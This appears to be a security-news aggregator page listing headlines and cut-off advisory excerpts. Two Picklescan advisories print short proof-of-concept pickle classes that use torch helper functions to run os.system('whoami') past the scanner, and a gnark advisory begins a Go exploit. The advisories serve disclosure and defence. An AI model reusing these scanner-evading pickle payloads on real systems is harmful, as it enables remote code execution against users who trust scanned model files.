Security
Headlines
HeadlinesLatestCVEs

Tag

#git

Only 7 Days Left for Early Bird Registration to the OpenSSL Conference 2025

Newark, United States, 25th August 2025, CyberNewsWire

HackRead
Open in Source
#git#ssl
GHSA-rx7m-68vc-ppxh: PhpSpreadsheet vulnerable to SSRF when reading and displaying a processed HTML document in the browser

**Product:** PhpSpreadsheet **Version:** 3.8.0 **CWE-ID:** CWE-918: Server-Side Request Forgery (SSRF) **CVSS vector v.3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) **CVSS vector v.4.0:** 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N) **Description:** SSRF occurs when a processed HTML document is read and displayed in the browser **Impact:** Server-Side Request Forgery **Vulnerable component:** the `PhpOffice\PhpSpreadsheet\Worksheet\Drawing` class, `setPath` method **Exploitation conditions:** getting a string from the user that is passed to the HTML reader **Mitigation:** improved processing of the `$path` variable of the `setPath` method of the `PhpOffice\PhpSpreadsheet\Worksheet\Drawing` class is needed **Researcher: Aleksey Solovev (Positive Technologies)** # Research The researcher discovered zero-day vulnerability Server-Side Request Forgery (SSRF) (in the `setPath` method of the `PhpOffice\PhpSpreadsheet\Worksheet\Drawing` class) in Phpspreadsheet. The latest ...

Cybercriminals Exploit Cheap VPS to Launch SaaS Hijacking Attacks

Darktrace researchers have discovered a new wave of attacks where cybercriminals use cheap Virtual Private Servers (VPS) to…

postMessaged and Compromised

At Microsoft, securing the ecosystem means more than just fixing bugs—it means proactively hunting for variant classes, identifying systemic weaknesses, and working across teams to protect customers before attackers ever get the chance. This blog highlights one such effort: a deep dive into the risks of misconfigured postMessage handlers across Microsoft services and how MSRC worked with engineering teams to mitigate them.

CTM360 Report Explains How Emotions Fuel Modern Fraud

CTM360 research reveals how scammers hook their victims through manipulative traps built on AI, stolen data, and brand…

Fake CoinMarketCap Journalists Targeting Crypto Executives in Spear-Phishing Campaign

Fake CoinMarketCap journalist profiles used in spear-phishing target crypto execs via Zoom interviews, risking malware, data theft, and…

COOKIE SPIDER’s Malvertising Drops New SHAMOS macOS Malware

CrowdStrike reports COOKIE SPIDER using malvertising to spread SHAMOS macOS malware (a new variant of AMOS infostealer), stealing…

GHSA-95v9-hv42-pwrj: gnark is vulnerable to signature malleability in EdDSA and ECDSA due to missing scalar checks

In version before, `sig.s` used without asserting `0 ≤ S < order` in `Verify function` in [eddsa.go](https://github.com/Consensys/gnark/blob/d9a42397979b05f95f21a601fd219b06a8d60b7b/std/signature/eddsa/eddsa.go) and [ecdsa.go](https://github.com/Consensys/gnark/blob/d9a42397979b05f95f21a601fd219b06a8d60b7b/std/signature/ecdsa/ecdsa.go), which will lead to *signature malleability* vulnerability. ### Impact Since gnark’s native EdDSA and ECDSA circuits lack essential constraints, multiple distinct witnesses can satisfy the same public inputs. In protocols where nullifiers or anti-replay checks are derived from `(R, S)`, this enables signature malleability and may lead to double spending. ### Exploitation ```go package main import ( "crypto/rand" "fmt" "math/big" "github.com/consensys/gnark-crypto/ecc" mimcHash "github.com/consensys/gnark-crypto/ecc/bn254/fr/mimc" eddsaCrypto "github.com/consensys/gnark-crypto/ecc/bn254/twistededwards/eddsa" "github.com/consensys/gnark/...

GHSA-vv6j-3g6g-2pvj: Picklescan missing detection when calling pytorch function torch.utils._config_module.load_config

### Summary Using torch.utils._config_module.load_config function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.utils._config_module.load_config function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import pickle from torch.utils._config_module import ConfigModule class Evil: def __reduce__(self): return (os.system, ('whoami',)) class EvilTorchUtilsConfigModuleLoadConfig: def __reduce__(self): evil_payload = pickle.dumps(Evil()) return ConfigModule.load_config, (None, evil_payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malici...

GHSA-vr7h-p6mm-wpmh: Picklescan missing detection when calling pytorch function torch.jit.unsupported_tensor_ops.execWrapper

### Summary Using torch.jit.unsupported_tensor_ops.execWrapper function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.jit.unsupported_tensor_ops.execWrapper function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import torch.jit.unsupported_tensor_ops as unsupported_tensor_ops class EvilTorchJitUnsupportedTensorOpsExecWrapper: def __reduce__(self): code = '__import__("os").system("whoami")' glob = {} loc = {} return unsupported_tensor_ops.execWrapper, (code, glob, loc) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle...